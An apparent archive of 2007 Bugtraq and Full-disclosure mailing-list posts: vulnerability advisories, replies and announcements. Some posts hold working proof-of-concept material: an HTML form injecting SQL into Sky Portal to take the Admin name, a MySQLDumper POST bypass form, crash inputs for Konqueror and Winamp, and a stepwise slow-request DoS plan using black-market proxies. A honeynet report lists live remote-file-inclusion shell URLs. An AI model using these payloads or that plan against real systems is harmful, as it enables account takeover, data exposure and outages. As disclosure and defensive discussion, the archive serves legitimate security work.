#

# Title: [Sky Portal] Multiple SQL Injection Vulnerabilities

# Vendor: http://skyportal.net

# Exploitation: Remote with browser

# Fix Available: Patched In Last Version In Vendor

###

# Leaders : Shahin Ramezany  Sorush Dalili

# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi

# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com

# Country: Iran

# Contact : [EMAIL PROTECTED]

 Bug Description ###


Description:



A Lot Of Sql Injection Found And We Exploit One Of them

A Registered User Can Change His/Her Name And Read All Other's Private Messages.


Vulnerabilities:



+-- Multiple SQL Injection Vulnerabilities


nc_top.asp Line 59 

strDBNTFUserName = Mitoone injection bezane be functione line 60 iani isMbr() 
 test.htm  but !??! this function is very crazy!

--

user can delete all bookmarks

inc_bookmarks.asp line 179

delSQL = DELETE FROM  strTablePrefix  BOOKMARKS WHERE BOOKMARK_ID =   
delBkmk(ib)


this file use from cp_main.asp

---


inc_profile_functions.asp

line 568,570,572,573


---


user can delete all SUBSCRIPTIONS

inc_SUBSCRIPTIONS.asp line 163

delSQL = DELETE FROM  strTablePrefix  SUBSCRIPTIONS WHERE SUBSCRIPTION_ID 
=   delBkmk(ib)

executeThis(delSQL)

this file use from cp_main.asp



-- Html Exploit --


form action=http://[VICTIM URL]/cp_main.asp?mode=EditItcmd=9 method=post

Photo_URL: input type=text name=Photo_URL value= size=200/

br /

Avatar_URL[injection goes here]: input type=text name=Avatar_URL 
value=',M_Name='Admin',M_Username='Admin /

br /

LINK1[Also injection goes here]: input type=text name=LINK1 value= /

br /

LINK2[Also injection goes here]: input type=text name=LINK2 value= /

br /

Password: input type=text name=Password-d value=YOU MUST ENTER YOUR 
HASHED PASSWORD HERE (For Ex: 123123 = defbfbd84d16387273dde914fd309c3b) /

br /

Email: input type=text name=Email value=[EMAIL PROTECTED] /

br /

Name: input type=text name=Name value=Your Current Username /

br /

RECMAIL: input type=text name=RECMAIL value=0 /

br /

HideMail: input type=text name=HideMail value=1 /

br /

br /

input type=submit /

/form


Credit:



BugReport Security Research  Penetration Testing Group

WwW.BugReport.ir

CVE-2007-4600 - Mathcad Protect Worksheet Vulnerability

[bugtraq]

Mathcad Security Vulnerability Briefing - CVE-2007-4600



Synopsis of Vulnerability

==

The ‘Protect Worksheet’ functionality, used to protect sections Mathcad sheets 
from alterations, in versions 12 through 14 is easily bypassed allowing access 
to the protected data due to the implementation of the file format used to save 
the files. 



Background on Mathcad

==

Mathcad (http://www.ptc.com/appserver/mkt/products/home.jsp?k=3901) is used to 
perform, document and share calculation and design work. The unique Mathcad 
visual format and scratchpad interface integrate standard mathematical 
notation, text and graphs in a single worksheet - making Mathcad ideal for 
knowledge capture, calculation reuse, and engineering collaboration.



Vulnerable Software Versions

=

Mathsoft, Mathcad 12 

Mathsoft, Mathcad 13

Mathsoft, Mathcad 13.1

PTC,  Mathcad 14


Running on Microsoft, Windows 2000, Service Pack 4

Running on Microsoft, Windows XP, Service Pack 2



Impact

===

Access Vector:  Locally exploitable.

Access Complexity:  Low.

Authentication: Not required to exploit.

Impact type:Provides unauthorised access. Allows partial 
confidentiality, integrity, and availability violation. Allows unauthorised 
disclosure of information.



Description of Vulnerability

=

According to Mathcad’s online help: 


‘When distributing worksheets, you may wish to restrict user access to most 
regions. Rather than locking an area, you may opt instead to use worksheet 
protection.

The intent of file protection is to prevent other users from opening the 
worksheet in a text editor and editing its contents by hand. The allowed file 
formats are either binary (XMCDZ, MCD) or output-only (RTF, HTML). With file 
protection enabled, you can only alter the contents of a worksheet from 
Mathcad. You can create, edit, and delete regions within the worksheet with no 
restrictions.’




The XMCDZ file format is not a true binary format. It is the standard Mathcad 
.XMCD XML sheet, which has been GZIPPED. For this reason it is a simple matter 
to get the original plain text XML sheet out of the file, using an archive 
utility.


Once the XML file has been extracted, within the editor tag there will be a 
protection tag. This will look like: 

protection protection-level=low password=XZEdIlJPXZxa1CQRKn6Sfw==/ 


There are 2 components to this tag; the level of restrictions places upon the 
sheet and also an optional password needed for un-protecting the sheet. 


There are 3 protection-level settings, high, medium and low. These correspond 
to Editing, Content and File protection, respectively. For example if a sheet 
was saved with Editing protection enabled, then the protection tag would have 
a high protection level. This can easily be changed with a text editor before 
the sheet is reopened in Mathcad.


The password is hashed, however the same hash is always produced for a given 
string. For example XZEdIlJPXZxa1CQRKn6Sfw== represents the string 
password, and could be used in any sheet. 


Due to these limitations the entire protection tag could be removed, the 
level of protection could be reduced, or the password could be changed. 


The MCD format is a proprietary binary type format. It was used in older 
version of the application, before the XML format became the standard. However 
if this format is selected from a newer version of the application, a warning 
is generated stating that ‘If your worksheet is saved as a Mathcad 11 file, 
some features and calculations may not be preserved’. Selecting either Mathcad 
11 or Mathcad 12 MCD file formats produces a warning about potential loss of 
functionality.


The sheets do include an MD5 hash, however this is only used internally by the 
application to determine if the sheet has been changed outside of Mathcad and 
the equations require recalculating. Changing the protection tag in the XML 
file will not be detected by the application, and no exceptions will be raised.



Workaround

===

None.



Proof of Concept

=

None required.

Re: [Full-disclosure] 0day: PDF pwns Windows

[bugtraq]

Can we close this thread now?

http://en.wikipedia.org/wiki/Zero_day

A zero-day (or zero-hour) attack is a computer threat that exposes undisclosed 
or unpatched computer application vulnerabilities. Zero-day attacks take 
advantage of computer security holes for which no solution is currently 
available.


 Steven Adair wrote:
  Not in my book.  I guess the people on this list are working off too many
  different definitions of 0day.  0day to me is something for which there is
  no patch/update at the time of the exploit being coded/used.  So if I code
  an exploit for IE right now and they don't patch it until April September
  2008, it's a 0day exploit for a year.  It's not necessarily new and it
  doesn't have to be used maliciously.
  
  If I code an exploit (for which there is no patch) and use it on my own
  servers, does that mean it's not 0day?  I don't think so.  If my WordPress
  blog gets owned by pwnpress, that's not 0day.. there's patches/updates for
  everything on there.  It just makes me an idiot for not upgrading.  Now if
  I get hit with some WP exploit that's not patched, then that's another
  [0-day] story.
  
  Steven
  securityzone.org
  
 
 If you're going to steal a term from the biological community at least 
 use in in the same context.  The biological metaphor is getting 
 stretched so much that people forget that these terms have meaning 
 outside the IT realm.
 
 -- 
 Wayne D. Hoxsie Jr.
 
- Robert
http://www.cgisecurity.com/

Re: Re: [BuHa-Security] Winamp 5.35 (Infinite) M3U File Inclusion DoS Vulnerability

[bugtraq]

Hi 3APA3A,

3APA3A wrote:
 Can you, please explain why is this security bug?

I think you mistake my posting. I did not want to say that this issue is a 
(real) *security* vulnerability but I definitely would call it a DoS bug. 

 DoS is not software crash, DoS is Denial of Service. It means,
 security impact of DoS vulnerability should be preventing (blocking)
 access of legitimate user to some data or service (via data
 corruption, service malfuction, etc).

It seems we have a different understanding of the term Denial Of Service. In 
my opinion your explanation exactly matches this issue. As you said DoS is the 
attempt to make a (computer) resource unavailable to its user via data 
corruption etc. Here Winamp is the computer resource and the M3U file is the 
corrupted data. Sure the user can easily recover from this DoS by restarting 
the audio player and to be exact the M3U file is not a great example for 
corrupted data but I would still call this issue a DoS bug. 

How would you name it? Winamp 5.35 (Infinite) M3U File Inclusion Stack 
Overflow Exception? 

Best regards,
Thomas Waldegger

[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #16|Aug 01st, 2007 |
 ---
| Vendor   | KDE's Konqueror|
| URL  | http://www.konqueror.org/  |
| Version  | = 3.5.7   |
| Risk | Low (Denial Of Service)|
 ---

o Description:
=

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:
===

Following HTML code forces Konqueror to crash:
 textarea/button/textarea/brbdo dir=
 preframeset
 a

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

 (gdb) set args konqueror.html
 (gdb) r
 Starting program: /usr/bin/konqueror konqueror.html
 (no debugging symbols found)
 [...]
 [Thread debugging using libthread_db enabled]
 [New Thread -1234381104 (LWP 5982)]
 (no debugging symbols found)
 [...]
 Qt: gdb: -nograb added to command-line options.
  Use the -dograb option to enforce grabbing.
 X Error: BadDevice, invalid or uninitialized input device 169
   Major opcode:  145
   Minor opcode:  3
   Resource id:  0x0
 Failed to open device
 X Error: BadDevice, invalid or uninitialized input device 169
   Major opcode:  145
   Minor opcode:  3
   Resource id:  0x0
 Failed to open device
 (no debugging symbols found)
 [...]

 Program received signal SIGSEGV, Segmentation fault.
 [Switching to Thread -1234381104 (LWP 5982)]
 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and when commenting out the assert the backtrace ends in:

 #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
 at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
 #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
 obj=0x0)
 at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.

o Disclosure Timeline:
=

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:
==

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16
WHuq7rPUBPx1/5nx+jJUPDg=
=R4ZU
-END PGP SIGNATURE-

[BuHa-Security] Winamp 5.35 (Infinite) M3U File Inclusion DoS Vulnerability

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #15|Jul 30th, 2007 |
 ---
| Vendor   | Nullsoft's Winamp (Lite)   |
| URL  | http://www.winamp.com/ |
| Version  | = 5.35|
| Risk | Low (Denial Of Service)|
 ---

o Description:
=

Winamp is a proprietary media player for Windows systems. Visit
http://www.winamp.com/ for detailed information.

o Denial Of Service:
===

The M3U file format allows it to include local and remote files by
simply specifing the path to the desired file. Furthermore Winamp does
not check if the M3U file to include is the currently processed M3U
file wherefore it's possible to force Winamp to recursively read a
certain M3U file. Winamp allocates memory by each iteration which
leads to a stack overflow exception (0xc0fd).

You are able to simply test this bug yourself by creating a file named
'a.m3u' with the content 'a.m3u'. If you are using the standard version
of Winamp (not the Lite version) you just have to add the M3U file to
Winamp by for example simply dragging the file into the playlist.

The lite version catches the exception and exits if you add the
malformed M3U file to the playlist. If you use the Enqueue in Winamp
option (if configured you'll find it in the context menu) Winamp Lite
does not catch the exception and crashes too.

It's also possible to add a remote file to the playlist by clicking
on Add - Add URL and inserting a URL like:
http://morph3us.org/security/pen-testing/winamp/a.m3u

These are the register values and the ASM dump at the time of the stack
overflow exception:
 eax=0d64 ebx=025b ecx=00032b90 edx=7c91eb94 esi=
 edi=000381c0 eip=0045ffe5 esp=00036b88 ebp=00036b90

 Function: winamp
 0045ffba cc   int 3
 0045ffbb cc   int 3
 0045ffbc cc   int 3
 0045ffbd cc   int 3
 0045ffbe cc   int 3
 0045ffbf cc   int 3
 0045ffc0 3d0010   cmp eax,0x1000
 0045ffc5 730e jnb winamp+0x5ffd5 (0045ffd5)
 0045ffc7 f7d8 neg eax
 0045ffc9 03c4 add eax,esp
 0045ffcb 83c004   add eax,0x4
 0045ffce 8500 test[eax],eax
 0045ffd0 94   xchgeax,esp
 0045ffd1 8b00 mov eax,[eax]
 0045ffd3 50   pusheax
 0045ffd4 c3   ret
 0045ffd5 51   pushecx
 0045ffd6 8d4c2408 lea ecx,[esp+0x8]
 0045ffda 81e90010 sub ecx,0x1000
 0045ffe0 2d0010   sub eax,0x1000
 FAULT -0045ffe5 8501 test[ecx],eax
   ds:0023:00032b90=
 0045ffe7 3d0010   cmp eax,0x1000
 0045ffec 73ec jnb winamp+0x5ffda (0045ffda)
 0045ffee 2bc8 sub ecx,eax
 0045fff0 8bc4 mov eax,esp
 0045fff2 8501 test[ecx],eax
 0045fff4 8be1 mov esp,ecx
 0045fff6 8b08 mov ecx,[eax]
 0045fff8 8b4004   mov eax,[eax+0x4]
 0045fffb 50   pusheax
 0045fffc c3   ret
 0045fffd cc   int 3
 0045fffe cc   int 3
 0045 cc   int 3
 0046 80f940   cmp cl,0x40
 00460003 7316 jnb winamp+0x6001b (0046001b)
 00460005 80f920   cmp cl,0x20
 00460008 7306 jnb winamp+0x60010 (00460010)
 0046000a 0fadd0   shrdeax,edx,cl
 0046000d d3fa sar edx,cl
 0046000f c3   ret

This bug does not seem to be exploitable.

o Disclosure Timeline:
=

xx Jan 07 - Vulnerability discovered.
14 Apr 07 - Vendor contacted.
30 Jul 07 - Public release.

o Solution:
==

There is no solution yet.

I sent a mail to [EMAIL PROTECTED] (I did not find a better contact
address) on April the 14th but did not receive an answer until now.

o Credits:
=

Thanks to destructor who originally spotted the bug and nait who analysed
the vulnerability.

Christian Deneke (nait) [EMAIL PROTECTED]
http://www.deneke.biz/

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails 

Re: [Full-disclosure] Mozilla protocol abuse

[bugtraq]

Does anyone know of a full list of Protocol handlers on the major browsers in a 
central location?

- Robert
http://www.cgisecurity.com/ Application Security news and more.

 
 The Mozilla application platform currently has an unpatched input 
 validation flaw which allows you to specify arbitrary command line 
 arguments to any registered URL protocol handler process. Jesper 
 Johansson already detailed parts of this on his blog on July 20, 
 http://msinfluentials.com/blogs/jesper/. I wrote a vulnerability report 
 on July 18 together with a proof-of-concept exploit that targeted 
 Thunderbird 2.0.0.4.
 
 Thunderbird 2.0.0.5 was released on July 19 and incidentally fixed this 
 specific attack vector through its osint command line flag. It is now 
 6 days later and people should have had time to update their Thunderbird 
 installations, so I have decided to publish my vulnerability report 
 together with the exploits as they detail how to handle XPI exploitation.
 
 The HTML version can be found at
 
 http://larholm.com/2007/07/25/mozilla-protocol-abuse/
 
 A ZIP file with the report and the XPI exploits can be found at
 
 http://larholm.com/media/2007/7/mozillaprotocolabuse.zip 
 
 
 Cheers
 Thor Larholm
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

MySQLDumper vulnerability: Bypassing Apache based access control possible

[bugtraq]

A critical security issue has been found in the Open Source PHP backup
tool MySQLDumper [0]. The issue allows to bypass an Apache based access
control created with MySQLDumper. Through this an attacker can easily gain
full control about all features of MySQLDumper.

The authors of MySQLDumper were informed about the problem on June 12,
2007 via email. In a reply we received on June 24, 2007, one author stated
that he does not agree that there is a security issue. Because we don't
have the impression that the authors are going to fix this issue and
inform the public about the hole, we decided to publish this issue.

The issue was found by Henning Pingel and Lars Houmark.

 About MySQLDumper 

The main purpose of MySQLDumper is to create full backups of large MySQL
databases from a web interface without the need for a shell access. It
also allows to administrate MySQL databases.

To ensure that only authenticated users have access to an instance of
MySQLDumper the tool offers a built-in feature to create a pair of
.htaccess and .htpasswd files to password protect the directory in which
the tool has been installed on Apache web servers. This feature is
documented in a tutorial [2].

 Affected versions 

Every currently available version of mysqldumper listed on [1] has this hole:

- MySQLDumper 1.23_pre_release_REV227
- MySQLDumper 1.22
- MySQLDumper 1.21b
- MySQLDumper Typo3-Extension 0.0.5

 Description of the security issue 

Inside of the generated .htaccess file the Apache directive LIMIT is used.
The parameters used within the LIMIT directive are not sufficient so that
the folder protection is not reliable. In the php file main.php in line 52
(line number depends on the version of the tool, please search for limit
get) the content of the file .htaccess is created. Interesting is this
section:

  Limit GET

The problem is, that this means that the password protection is only valid
for HTTP GET requests, but not for other request types like HTTP POST
requests. For further information on the directive LIMIT please have a
look at the Apache documentation [3,4].

To say it more clearly: If one requests a file inside of the protected
MySQLDumper folder, one is not asked for user and password if you use a
POST request to request the file. That means the whole .htaccess/.htpasswd
protection is useless.

 Proof of concept 

htmlbody
form action=http://localhost/mysqldumper1.23/main.php; method=post
   input type=submit value=main
/form
/body/html

In the same way it is possible to execute the functionality of MySQLDumper
to delete .htaccess and .htpasswd file via a POST request.

 First aid for users of MySQLDumper 

1) Delete MySQLDumper folder from web space if it is installed in a
guessable path or
2) Correct the content of .htaccess / .htpasswd files to make them reliable.

 Related links 

[0] http://www.mysqldumper.de
[1] http://www.mysqldumper.de/board/downloads.php?cat=2
[2] http://www.mysqldumper.de/tuts/de/htaccess/msd_htaccess.html
[3] http://httpd.apache.org/docs/1.3/mod/core.html#limit
[4] http://httpd.apache.org/docs/2.0/mod/core.html#limit

[tool] Etherbat - Ethernet topology discovery

[bugtraq]

Hello,

I would like to annouce Etherbat, a tool for Ethernet topology discovery
which I presented on Confidence 2007 conference in Krakow, Poland.
Etherbat performs topology discovery between 3 hosts: the local machine
and two other devices.
It could be usefull for an administrator tracking an intruder, an auditor 
performing a security audit or an attacker trying to find out more about the 
network structure.
Etherbat could be described as layer 2 equivalent of traceroute. No
manageable switches nor extra software on remote hosts is required.

Etherbat is released under GPLv2 license.

Etherbat homepage:
http://etherbat.cryptonix.org

--
Pawel Pokrywka
https://secure.cryptonix.org

Re: Your Opinion

[bugtraq]

I think an issue is that if they are providing an OS and charging for it, that 
it should have these security features
by default. The user shouldn't have to pay additional money to ensure the 
initial product they purchased
is secure. Not to mention of course certain vendors are going to start seeing a 
drop in business for certain products. I wonder
will this turn out like the IE/Netscape browser wars a few years ago?

Regards,
- Robert Auger
http://www.cgisecurity.com/ Application Security news and More
http://www.webappsec.org/
http://www.qasec.com/


 I have heard the comment It's a huge conflict of interest for one company 
 to provide both an operating platform and a security platform made by John 
 Thompson (CEO Symantec) many times from many different people.  See article 
 below.
 
 http://www2.csoonline.com/blog_view.html?CID=32554
 
 In my personal opinion, regardless of the vendor, if they create an OS, why 
 would it be a conflict of interest for them to want to protect their own OS 
 from attack.  One would assume that this is a responsible approach by the 
 vendor, but one could also argue that their OS should be coded securely in 
 the first place.  If this were to happen then the need for the Symantec's, 
 McAfee's of the world would some what diminsh.
 
 Anyway I am just curious as to what other people think.
 
 Thanks in advance
 
 Mark 
 

LI-Guestbook SQL Injection Vulnerability

[bugtraq]

New Advisory:
LI-Guestbook SQL Injection Vulnerability
http://belsec.com/advisories/139/summary.html

Summary
Belsec ID: BS0001
Vendor: LI-Scripts
Vendor's Web Site: http://www.liscripts.net
Software: LI-Guestbook
Sowtware's Web Site: http://www.liscripts.net/products.php#guestbook
Versions: 1.1
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: Belsec Team

-Description---
1. SQL Injection.

Vulnerable script: guestbook.php

Parameter 'country' is not properly sanitized before being used in SQL
query. This can be used to make SQL queries by injecting arbitrary SQL
code.

Condition: magic_quotes_gpc = off

--PoC/Exploit--
Waiting for developer(s) reply.

--Solution-
No Patch available.

--Credit---
Discovered by: Belsec Team


Regards,
Belsec Team
http://belsec.com

Sava's GuestBook Multiple Vulnerabilities

[bugtraq]

New Advisory:
Sava's GuestBook Multiple Vulnerablities
http://belsec.com/advisories/142/summary.html

Summary
Belsec ID: BS0002
Software: Sava's GuestBook
Sowtware's Web Site: http://savasplace.com
Versions: 23.11.2006
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: Belsec Team

-Description---
1. SQL Injection.

Vulnerable script: add2.php

Parameters 'name', 'country', 'email', 'website', 'message' is not
properly sanitized before being used in SQL query. This can be used to
make SQL queries by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off


2. Cross-Site Scripting.

Vulnerable Script: add2.php

Parameter 'name', 'country', 'email', 'website' is not properly sanitized.
This can be used to post arbitrary HTML or web script code.

--PoC/Exploit--
Waiting for developer(s) reply.

--Solution-
No Patch available.

--Credit---
Discovered by: Belsec Team


Regards,
Belsec Team
http://belsec.com

Announcement: The Cross-site Request Forgery FAQ

[bugtraq]

 The Cross-site Request Forgery FAQ has been released to address some of the 
common 
 questions and misconceptions regarding this commonly misunderstood web flaw.   
  
 URL: The Cross-site Request Forgery FAQ 
 http://www.cgisecurity.com/articles/csrf-faq.shtml 
  
  
 Regards, 
  
 - Robert 
 [EMAIL PROTECTED] 
 http://www.cgisecurity.com/ 
 http://www.qasec.com/ 
 http://www.webappsec.org/ 
 

Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability

[HACKPL - bugtraq/sapheal]

So it could be remotely
exploitable after all.

On the other hand, most people don't tell their browsers to open up a
separate application to handle ftp:// links.



I agree. It could be exploited in the aforementioned way(but: WS_FTP is not 
registered to handle FTP protocol by default). Now I am thinking of 
something else. Could we use a specially crafted FHF file to exploit the 
vulnerability? I haven't checked that yet.


Michal Bucko (sapheal) 

Re (3): Circumventing CSFR Form Token Defense

[bugtraq]

Sorry, this was worded in a very bad way, as my whole reply:

When writing my first message i wanted to express I could not test this with 
IE: I simply thought IE would not offer the possibility to render pages in 
objects. This is obviously wrong, although there seems to be a bug in IE (try 
it yourself: http://phihag.de/security/ie_iterate_freeze/ ) causing my 
experiments to fail. Upon rewriting the text too late (like now ;) ) tested 
with became  the final, totally senseless version I posted. I just tested it, 
it seems there is entirely no way to even address an object's contents if it is 
in the same domain (at least when it's embedded as the standard says). 

Just a little thought: Is there any possibility to fire up a text-reading 
ActiveX-Control (IE itself, some XML parsing modules?) in an object and read 
the content from outside?

(BTW: This would be primarily an UXSS but not a CSFR attack, as the whole 
scenario I described in the first message)

Re: [Full-disclosure] Web Honeynet Project: announcement,

[bugtraq]

The Web Application Security Consortium is also doing such a project at
http://www.webappsec.org/projects/honeypots/ . May be worthwhile to share data 
perhaps?

- zeno
http://www.cgisecurity.com/ Web Application Security news, and more
http://www.cgisecurity.com/index.rss [Security RSS Feed]


 
 [ Warning: this email message includes links to live web server malware
 propagated this Wednesday via file inclusions exploits. These links are
 not safe! ]
 
 Hello.
 
 The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will
 in the next few months announce research on real-world web server attacks
 which infect web servers with:
 Tools, connect-back shells, bots, downloaders, malware, etc. which are all
 cross-platform (for web servers) and currently exploited in the wild.
 
 The Web Honeynet Project will, for now, not deal with the regular SQL
 injection and XSS attacks every web security expert loves so much, but
 just with malware and code execution attacks on web servers and hosting
 farms.
 
 These attacks form botnets constructed from web servers (mainly IIS and
 Apache on Linux and Windows servers) and transform hosting farms/colos to
 attack platforms.
 
 Most of these tools are being injected by (mainly) file inclusion
 attacks against (mainly) PHP web applications, as is well known and
 established.
 
 PHP (or scripting) shells, etc. have been known for a while, as well as
 file inclusion (or RFI) attacks, however, mostly as something secondary
 and not much (if any - save for some blogs and a few mailing list posts a
 year ago) attention was given to the subject other than to the
 vulnerabilities themselves.
 
 The bad guys currently exploit, create botnets and deface in a massive
 fashion and force ISPs and colos to combat an impossible situation where
 any (mainly) PHP application from any user can exploit entire server
 farms, and where the web vulnerability serves as a remote exploit to be
 followed by a local code execution one, or as a direct one.
 
 What is new here is the scale, and the fact we now start engaging the bad
 guys on this front (which so far, they have been unchallenged on) -
 meaning aside for research, the Web Honeynet Project will also release
 actionable data on offensive IP addresses, URLs and on the tools
 themselves to be made available to operational folks, so that they can
 mitigate the threat.
 
 It's long overdue that we start the escalation war with web server
 attackers, much like we did with spam and botnets, etc. years ago. Several
 folks (and quite loudly - me) have been warning about this for a while,
 not it's time to take action instead of talk. :)
 
 Note: Below you can find sample statistics on some of the Web Honeynet
 Project information for this last Wednesday, on file inclusion attacks
 seeding malware.
 You will likely notice most of these have been taken care of by now.
 
 The first research on the subject (after looking into several hundred such
 tools) will be made public in the February edition of the Virus Bulletin
 magazine, from:
 Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).
 
 The SecuriTeam and ISOTF Web Honeynet Project would like to thank
 Beyond Security ( http://www.beyondsecurity.com ) for all the support.
 
 Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the
 new members of the project.
 
 For more information on the Web Honeynet Project feel free to contact me.
 
 Also, thanks for yet others who helped me form this research and
 operations hybrid project (you know who you are).
 
   Gadi.
 
 Sample report and statistics (for Wednesday the 10th of January, 2007):
 
 IP | Hit Count | Malware (Count), ... |
 195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4), 
 http://m embers.lycos.co.uk/onuhack/injek.txt? (6), 
 http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
 69.93.147.242 | 11 | http://w
 ww.clubmusic.caucasus.net/administrator/cmd.gif? 
 (1), http://c lubmusic.caucasus.net/administrator/cmd.gif? (4), 
 http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (5), 
 http://t bchat.caucasus.net/cmd.gif? (1),
 216.22.3.11 | 8 | http://h eidi.by.ru/cmdi.txt? (7), 
 http://h eidiz.by.ru/cmdi.txt? (1),
 62.149.36.116 | 8 | 
 http://w ww.fc-magdeburg.de/jscripts/tiny_mce/plugins/pic.gif?? (3), 
 http://w ww.discoverchimpanzees.org/blog/sendit.jpg?? (2), 
 http://u bk.no-ip.biz/shine.jpg?? (1), 
 http://w ww.sle.br/polvo2/script/ftv3doc.gif?? (1), 
 http://w ww.sle.br/polvo2/css/css.gif?? (1),
 85.25.148.178 | 7 | h ttp://213.133.108.122/alex.gif? (1), 
 http://c lubmusic.caucasus.net/Administrator/cmd.gif? (5), 
 http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (1),
 69.13.6.170 | 7 | http://c ajem.by.ru/cmd.gif? (3), 
 http://k ama.opensolarisproject.com/phpBB2/files/cmd.gif? (1), 
 http://s upsup.by.ru/cmd.gif? (2), http://w
 ww.bhlynx.org/htdig/sad.gif? (1),
 201.63.179.122 | 7 | http://d arkhand.netfast.org/list.txt??? (2), 
 http://w 

Re: a cheesy Apache / IIS DoS vuln (+a question)

[bugtraq]

On Tue, Jan 09, 2007 at 12:15:02AM -0600, William A. Rowe, Jr. wrote:
 
 bugtraq wrote:
  
  a quick fix for this can be available at least on bsd, there is accf_http 
  that can be modified not to pass the connection to apache until a full 
  request
  is read (either get or post, full, not just the first get request header, 
  of course this can be even worst for a lot of post data).
 
 For what it is worth, Apache 2.2.x and later introduce support for http 
 accept()
 filtering on platforms which support httpfilter.  Since Apache 2.0.x, AcceptEx
 is supported on Win32 to pend accept() for at least the initial request 
 payload.
 
 Of course this is not without some resource utilization for the incomplete
 request payloads, but at least it does offload the resources from the web
 server itself to the kernel socket layer.

1. apache does support socket level filtering but u must have the right code 
for every kind of attack. e.g. a default http accept filter on (free)bsd will 
just wait for the_request header. after that the web server will face the same 
problem. only delayed. ofcourse that filter should be seen more like an example
2. you get to fight again when sending the data - attacker wouldnt close the 
socket, but will slow down the read filling netbufs on server  side 
3. you have no chance to identify the bots without learning traffic patterns 
before ... 

offtopic, you can even use tor network - until one point (which?)  those *are* 
legit requests and tor network is slow enough to simplify the schedulers on 
attacker side :)
and i dont know how easy can be to proove attacker's guilt at the *real* value

not saying this is a big problem for everyone, but for most of the people it is 
and antiddos business sharks just waitin for the occasion to eat you more 
painful and prolly faster than attacker :P


 
 Bill

-- 
adrian ilarion ciobanu (cia)

Re: Circumventing CSFR Form Token Defense

[bugtraq]

If there is a method which enables JavaScript to set up arbitrary HTTP requests 
and read the server's answers, you could implement an autonomic browser which 
requests any pages (using the user's cookies to authenticate) and saves them 
somehow to an internal string. From then, there's no barrier for transmitting 
this data to the attacker's server. Alternatively, the script may perform all 
the work the attacker wants it to (download all gmail messages...) and send 
this to the attacker. Therefore I agree that any tokens do not add security.

Testing (only with IE, Firefox, Opera and Konqueror so far) I found no way how 
to circumvent the restrictions of *reading* requested pages from JS - setting 
up the request works, but attempts to read the document (embedded in an 
frame/object*/iframe) failed with some access denied exception (FF,Opera: 
exception, Konqueror: undefined values, IE: Strange errors) when domain names 
do not match. (So that the potential of the attack is still there - think eBay 
and their JS policy - but limited to sites allowing users to write JS - || 
browsers not taking extensive precautions in handling JS between frames/objects)

XMLHttpRequest et al are limited in the same way.

So The javascript makes a simple HTTP/S request to the form (...) turns out 
to be the critical problem. Any ideas how to set up and somehow read a HTTP 
request to another server in JavaScript?

*except IE

QASEC Announcement: Writing Software Security Test Cases

[bugtraq]

I've Just released an article about how the Quality Assurance phase of the 
development 
cycle can incorporate security testing into a standard test plan, and make it 
part 
of the regular testing cycle.

Writing Software Security Test Cases: Putting security test cases into your 
test plan
http://www.qasec.com/cycle/securitytestcases.shtml


- Robert
[EMAIL PROTECTED]
http://www.cgisecurity.com/
http://www.qasec.com/

Re: a cheesy Apache / IIS DoS vuln (+a question)

[bugtraq]

to kill is enough not to finish the request and let it timeout on server side.
no ddos/dos protection layers can stand against this attack (as far as i know) 
and the scenario is simple 
1. fingerprint the timeout on serverside
2. dig the sitemap from target
3. build a list of browsers to advertise to server during request
4. buy proxies from black market 
5. start requests thru proxies to target
